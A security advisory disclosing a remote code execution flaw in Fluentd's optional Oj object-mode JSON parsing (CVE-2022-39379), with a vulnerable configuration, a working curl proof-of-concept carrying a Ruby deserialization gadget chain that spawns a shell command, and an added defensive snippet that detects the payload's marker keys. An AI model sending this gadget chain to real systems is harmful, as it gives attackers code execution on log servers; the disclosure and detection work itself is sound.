November 17, 2022

GHSL-2022-067: Remote Code Execution (RCE) in Fluentd - CVE-2022-39379

Peter Stöckli

Coordinated Disclosure Timeline


A remote code execution (RCE) vulnerability in non-default configurations of Fluentd allowed unauthenticated attackers to execute arbitrary code via specially crafted JSON payloads.



Tested Version


Issue: Remote code execution due to insecure deserialization (in non-default configuration) (GHSL-2022-067)

Fluentd uses Oj as its JSON parser of choice if it’s installed. Fluentd allows the JSON parsing mode of Oj to be configured and explicitly allows it to be set to object. When Oj.load is used in object mode, arbitrary Ruby objects can be deserialized. Deserializing untrusted data using any method that allows the construction of arbitrary objects is easily exploitable and, in many cases, allows an attacker to execute arbitrary code. So-called “gadget chains” that allow code execution exist for all versions of Ruby.

Important: The default configuration of Fluentd is not vulnerable.

Proof of concept (for Ruby 2.x)


<source>
  @type http
  @id http_input
  <parse>
    @type json
  </parse>
  port 8888
</source>

After we start Fluentd, it can be attacked remotely with the following deserialization gadget chain, which creates the file /tmp/pwned.txt on the attacked Fluentd system.

curl -X POST -d '{"^#1":[[{"^c":"Gem::SpecFetcher"},{"^c":"Gem::Installer"},{"^o":"Gem::Requirement","requirements":{"^o":"Gem::Package::TarReader","io":{"^o":"Net::BufferedIO","io":{"^o":"Gem::Package::TarReader::Entry","read":0,"header":"any"},"debug_output":{"^o":"Net::WriteAdapter","socket":{"^o":"Gem::RequestSet","sets":{"^o":"Net::WriteAdapter","socket":{"^c":"Kernel"},"method_id":":spawn"},"git_set":"touch /tmp/pwned.txt"},"method_id":":resolve"}}}}],"any"]}' http://localhost:8888/debug.test

Successful exploitation will result in the creation of a /tmp/pwned.txt file on the attacked Fluentd system. (Note that the vulnerability can also be exploited by providing the above JSON-based log payload via other interfaces of Fluentd, e.g., via the console.)
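
For defenders, the following added example (not part of the advisory or of Fluentd's code) flags JSON bodies that carry the Oj object-mode marker keys visible in the payload above and checks whether object mode is selected. It assumes the mode is chosen through the FLUENT_OJ_OPTION_MODE environment variable; the function names and the sample bodies are constructed for illustration.

```ruby
require 'json'

# Marker keys limited to those visible in the advisory's payload:
# "^o" (object of the named class), "^c" (class reference), "^#<n>".
MARKER = /\A\^(?:o|c|#\d+)\z/

# Recursively collect every marker key in a parsed JSON value.
def oj_object_markers(node, path = '$', hits = [])
  case node
  when Hash
    node.each do |key, value|
      here = "#{path}.#{key}"
      if key.match?(MARKER)
        hits << { path: here, target: value.is_a?(String) ? value : nil }
      end
      oj_object_markers(value, here, hits)
    end
  when Array
    node.each_with_index { |v, i| oj_object_markers(v, "#{path}[#{i}]", hits) }
  end
  hits
end

# Scan one raw request body with the stdlib parser, which builds only
# plain hashes, arrays and scalars. Unparseable bodies yield no hits.
def scan_body(raw)
  oj_object_markers(JSON.parse(raw))
rescue JSON::ParserError
  []
end

# Assumption: Fluentd takes the Oj mode from FLUENT_OJ_OPTION_MODE.
def object_mode_configured?(env = ENV)
  env.fetch('FLUENT_OJ_OPTION_MODE', '').strip.delete_prefix(':').downcase == 'object'
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample bodies; the class name is a placeholder.
  samples = [
    '{"message":"login ok","user":"alice"}',
    '{"event":{"^o":"Example::Placeholder","n":1}}'
  ]
  samples.each { |body| puts "#{scan_body(body).length} marker(s): #{body}" }
  puts "object mode configured: #{object_mode_configured?}"
end
```

Ordinary log events have no reason to contain these keys, so a hit on an ingestion endpoint is worth alerting on even when the collector itself runs in the default configuration.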

Please note:


This issue may lead to remote code execution (RCE) if vulnerable configurations are used.



This issue was discovered and reported by GHSL team member @p- (Peter Stöckli).


You can contact the GHSL team at, please include a reference to GHSL-2022-067 in any communication regarding this issue.